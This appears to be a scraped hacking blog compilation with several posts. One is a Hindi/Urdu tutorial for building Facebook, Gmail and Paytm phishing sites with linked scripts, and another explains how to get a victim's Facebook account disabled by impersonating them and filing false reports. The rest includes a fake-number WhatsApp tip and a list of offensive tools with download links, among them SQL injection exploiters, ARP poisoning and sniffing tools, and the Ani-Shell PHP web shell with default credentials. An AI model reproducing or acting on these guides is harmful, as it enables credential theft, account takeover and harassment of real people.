In  my next post i will show you another easy way to find website IP Address and teachyou to use this IP to find its location.

How to hack facebook gmail patym account with phising

Image result for phishing
"Phishing"
Facebook, Gmail, Paytm. [hindi/Urdu]

1- Sabse phele- Wapka .mobi me accaunt bnaiye
2-Or fir wapka ki site khulegi. Usme register kigiye
3-Uske baad login kijiye or fir new site bnaiye wha aapko dikhega [ create new site] usper click krke site bnao or name rakho
4-Taki logo ko lge ki ye facebook walo ki site he
5-Ab aapki site banne ke baad aap usme (manage) me click kijiye
6-Aapko usme 2 modes dikehnge aap usme admin mode pr click kre
7-Admin mode pr click krte hi aapko 1 khali page samne ayega
8-Ab ::EDIT SITE(#):: pr click kro
9- Ab dusra page open hoga aap usme (WML/XHTML code) pr click kijiye
10-Uske baad aap phishing code Copy/ Download kijiye
Phishing Scripts
[Facebook Orignal Phishing Script]
Click Here To View Code
copy http://txt.do/al4gk
Download http://on.fb.me/1U2bZvl
[Paytm Phishing code]
Click Here To Script Page
http://on.fb.me/1JNP8yM
[Gmail Phishing]
Click Herefor gmail html Code Page
http://on.fb.me/1MOq4Z8
11-Aap inme se koi bhi code copy kre
12-Or fir jha html code maang rha he wha paste kre
13-Or fir Submit pr click kre or aapki phishing site bn jyegi
14-Or ha 1 baat ka Dheyan rkhe ki ye only opera mini me work kregi
15-Ab aap apni bnai hui phishing site ko kisi ko de or usse usme login karwaye or fir uska id or pass aapko mail me aa jyega.

How to chat with command prompt


Hello friends Now U Can Chat With Command Prompt THrough So Here IS A Trick.....

1) All you need is your friend's IP Address and your Command Prompt.
 2) Open Notepad and write this code as it is.....!
 @echo off
 :A
 Cls
 echo MESSENGER
 set /p n=User:
 set /p m=Message:
 net send %n% %m%
 Pause
 Goto A

 3) Now save this as "Messenger.Bat".
 4) Open Command Prompt.
 5) Drag this file (.bat file) over to Command Prompt and press Enter.
 6) You would then see something like this:


 7) Now, type the IP Address of the computer you want to contact and press enter
 You will see something like this:

 8) Now all you need to do is type your message and press Enter.
 Start Chatting.......!
DONE....ENJOY.~!!

DISABLE SOMEONE'S ID ON FB TRICK-1


DISABLE SOMEONE'S ID ON FB TRICK-1

hey guys ....today i'll teach you how to disable any fb id in 1 minute
so lets start :P
Step 1 : Open Victms PROFILE
Step 2 : open a new tab in google chrome bypressing cntrl + shift + N

Step 3 : MaKe a New AccOunT In yaHoo and fb and name must be as same as victims account

step 4 : when u r making account with victims name make sure u r putting each and every information and info that victims account have like date of birth,college,city etc everything

step 5 : copy the profile picture and cover photo of victims account and put those in ur fake account and send only 1 req to any person ( send req to ur real account the account in ur use) and now when victim accepts ur req then make sure u do ur friends to only me(important step)

step 6 : now open your fake account from any browser and go to ur victim link and click on report and then click (keep clicking) " its pretending to be or someone i know" and then submit now after submitting victims id will be disabled in 1 minute ( make sure u put each and every information right )


IF U HV SOME QUERY OR PROBLEM THEN COMMENT HERE!KEEP SHARING AND FOLLOW ME ON GOOGLE + AND
ADMIN POST(Pratyuso)

Saturday 21 May 2016

How To Use Whatsapp With Fake Number 2016


How To Use Whatsapp With Fake Number 2016

  • Download and install smart app from here.
  • After installing app will ask you to register.
  • After registration,Verify your mobile number.
  • Now,After verication you will get a new indonesian number.
  • You can use this number to make new account on whatsapp or in facebook.

TO BLOCK WEBSITE


Block websites without any software











>>>Steps



1] Browse C:\WINDOWS\system32\drivers\etc



2] Find the file named "HOSTS"



3] Open it in notepad



4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.orkut.com , and that site will no longer be accessable.



5] Done!






example :



127.0.0.1 localhost



127.0.0.2 www.orkut.com






www.orkut.com is now unaccessable






For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.






ie:



127.0.0.3 www.yahoo.com



127.0.0.4 www.msn.com



127.0.0.5 www.google.com






This also works with banner sites, just find the host name of the server with the banners and do the same thing with that addy.



Hope this small tutorial could keep you going in simple way of blocking websites..

Hacking Tools

winAUTOPWN v3.0 Released - System vulnerability exploitation
Framework


WINAUTOPWN ACTIVE SYSTEMS TRANSGRESSOR GUI [ C4 - WAST ] is a Systems and Network Exploitation Framework built on the famous winAUTOPWN as a backend.
C4 - WAST gives users the freedom to select individual exploits and use them.

BSDAUTOPWN has been compiled, like always for various flavours and has been upgraded to version 1.8 alongwith all applicable exploits
WINAUTOPWN requires PERL,PHP,PYTHON,RUBY and its dependencies alongwith a few others' too for smooth working of exploits included in it.

PhotobucketDownload 


The Mole: Automatic SQL Injection Exploitation Tool 
Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a Boolean query based technique. The Mole uses a command based interface, allowing the user to indicate the action he wants to perform easily. 
Read more



PhotobucketDownload 



Sqlninja 0.2.6
Features:
>> Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
>> Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental).
>> Creation of a custom xp_cmdshell if the original one has been removed
>> Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed).
>> TCP/UDP portscan from the target SQL Server to the attacking machine, in order
to find a port that is allowed by the firewall of the target network
and use it for a reverse shell.
>> Direct and reverse bindshell, both TCP and UDP
>> ICMP-tunneled shell, when no TCP/UDP ports are available for a direct/reverse
shell but the DB can ping your box.
>> DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for
a direct/reverse shell, but the DB server can resolve external hostnames
(check the documentation for details about how this works).
>> Evasion techniques to confuse a few IDS/IPS/WAF.
>> Integration with Metasploit3, to obtain a graphical access to the remote DB
server through a VNC server injection.

PhotobucketDownload

HexorBase - The DataBase Hacker Tool

To Audit Management and Multiple Databases

HexorBase is a database application designed for management and audit multiple database servers simultaneously from a single location, is able to perform SQL queries and brute force attacks against servers common database ( MySQL, SQLite, Microsoft
SQL Server, Oracle, PostgreSQL ).

This tool is simple to use and very practical, may have to know a little SQL, but the basics.

Video:

HexorBase runs on Linux and presumably Windows, and requires:
python-qt4 python python-MySQLdb cx_Oracle python-psycopg2 python-python-qscintilla2 pymssql
To install it you must download and from the console:
root @ host: ~ # dpkg-i hexorbase_1.0_all.deb


Project website and download HexorBase: 

http://code.google.com/p/hexorbase/



Net Tools 5.0 (Net Tools 5.x)


This tools is a hacker friendly. Net Tools is a comprehensive set of host monitoring, network scanning, security, administration tools and much more, all with a highly intuitive user interface. It's an ideal tool for those who work in the network security, administration, training, internet forensics or law enforcement internet crimes fields. Net Tools is mainly written in Microsoft Visual Basic 6, Visual C++, Visual C# and Visual Studio .NET.
There has a 175 tools list in one software.. Tools Content

PhotobucketDownload


Free Hacking Training Online

http://www.cybrary.it/?utm_source=hoc&utm_medium=banner&utm_campaign=purplebanner

ARPwner – ARP & DNS Poisoning Attack Tool
ARPwner is a tool to do ARP poisoning and DNS poisoning attacks, with a simple GUI and
a plugin system to do filtering of the information gathered, also has a implementation of SSLstrip and is coded in python.


PhotobucketDownload 
Read more 


Intercepter Sniffer

Intercepter is a sniffer tool which offers various capabilities including sniffing for password hashes related to ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/HTTP/
WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/MYSQL and ORACLE. It also sniffs ICQ/
AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC and MRA protocols. It has a built-in arp poisoning module, can change MAC addresses of LAN adapters, and has various other interesting functionality.

PhotobucketDownload 


Havij v1.15 Advanced SQL Injection
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

PhotobucketDownload 


Ani-Shell


Ani-Shell is a simple PHP shell with some unique features like Mass Mailer , A simple Web-Server Fuzzer , DDoser, Back Connect , Bind Shell etc etc ! This shell has immense capabilities and have been written with some coding standards in mind for better editing and customization.

Customisation
 
1. Email Trace back is set to Off as default and emails will not be sent , If you are setting
this feature on make sure you change the default email address (lionaneesh@gmail.com)
to Your email address , Please Change it before using.

2. Username and Passwords are set to lionaneesh and lionaneesh respectively , Please change them for better
security.
3. As a default Lock Mode is set to on! This should not be change unless you want your shell exposed.

Default Login
Username : lionaneesh
Password : lionaneesh

Features
 
Shell
Platform Independent
Mass - Mailer
Small Web-Server Fuzzer
DDoser
Design
Secure Login
Deletion of Files
Bind Shell
Back Connect
Fixed Some Coding errors!
Rename Files
Encoded Title
Traceback (Email Alerts)
PHP Evaluate
Better Command Execution (even supports older version of PHP)
Mass Code Injector (Appender and Overwriter)
Lock Mode Customization

Latest Version Addition
Mail Bomber (With Less Spam detection feature)
PHP Decoder
Better Uploader
Fixed some Coding errors

PhotobucketDownload



SQL MAP 0.9 


sqlmap 0.9 has been released and has a considerable amount of changes including an almost entirely re-written SQL Injection detection engine.

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. Its a good tools for find Sql Vulnerability.

New Features/Changes-->

Rewritten SQL injection detection engine (Bernardo and Miroslav).
Support to directly connect to the database without passing via a SQL injection, -d switch (Bernardo and Miroslav).
Added full support for both time-based blind SQL injection and error-based SQL injection techniques (Bernardo and Miroslav).
Implemented support for SQLite 2 and 3 (Bernardo and Miroslav).
Implemented support for Firebird (Bernardo and Miroslav).
Implemented support for Microsoft Access, Sybase and SAP MaxDB (Miroslav).
Added support to tamper injection data with –tamper switch (Bernardo and Miroslav).
Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack (Miroslav).
Added support to fetch unicode data (Bernardo and Miroslav).
Added support to use persistent HTTP(s) connection for speed improvement, –keep-alive switch (Miroslav).
Implemented several optimization switches to speed up the exploitation of SQL injections (Bernardo and Miroslav).
Support to parse and test forms on target url, –forms switch (Bernardo and Miroslav).
Added switches to brute-force tables names and columns names with a dictionary attack, –common-tables and –common-columns.

PhotobucketDownload


DRIL – Domain Reverse IP Lookup Tool:

DRIL (Domain Reverse IP Lookup) Tool is a Reverse Domain Tool that will really be useful for penetration testers to find out the domain names which are listed in the the target host, DRIL is a GUI, JAVA based application which uses a Bing API key.

DRIL has a simple user friendly interface which will be helpful for penetration tester to do their work fast without a mess, this is only tested on Linux but as it is JAVA it should work on Windows too.
There are various other tools which carry out similar tasks..

PhotobucketDownload